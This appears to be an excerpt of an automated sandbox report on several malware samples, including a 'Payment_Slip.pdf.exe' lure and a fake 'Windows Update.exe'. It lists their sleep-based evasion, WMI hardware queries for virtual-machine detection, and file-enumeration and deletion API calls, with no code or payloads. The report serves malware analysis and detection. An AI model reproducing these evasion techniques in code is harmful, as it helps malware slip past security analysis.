Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199758s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199631s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199380s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199078s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599869s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599764s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598999s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598889s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598669s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598012s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597397s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597171s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596952s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596624s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596077s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595749s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595421s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595202s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595041s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -594935s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -594820s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8700 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892 Thread sleep count: 5278 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199890s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892 Thread sleep count: 4521 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199672s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199530s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598662s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597358s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597029s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596593s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596046s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595827s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595714s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595588s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595250s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0041A01B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0040B28E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0040838E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_004087A0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_00407848
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004068CD FindFirstFileW,FindNextFileW, 11_2_004068CD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0044BA59 FindFirstFileExA, 11_2_0044BA59
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_00417AAB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0040AC78
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407C87
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_0041A01B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 17_2_0040B28E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_0040838E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_004087A0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00407848
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004068CD FindFirstFileW,FindNextFileW, 17_2_004068CD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0044BA59 FindFirstFileExA, 17_2_0044BA59
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_00417AAB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040AC78
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_00406D28
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00418981 memset,GetSystemInfo, 14_2_00418981
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199655
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599644
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599441
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599263
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599155
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598710
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598043
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597168
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597051
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199758
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199631
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199380
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598669
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598562
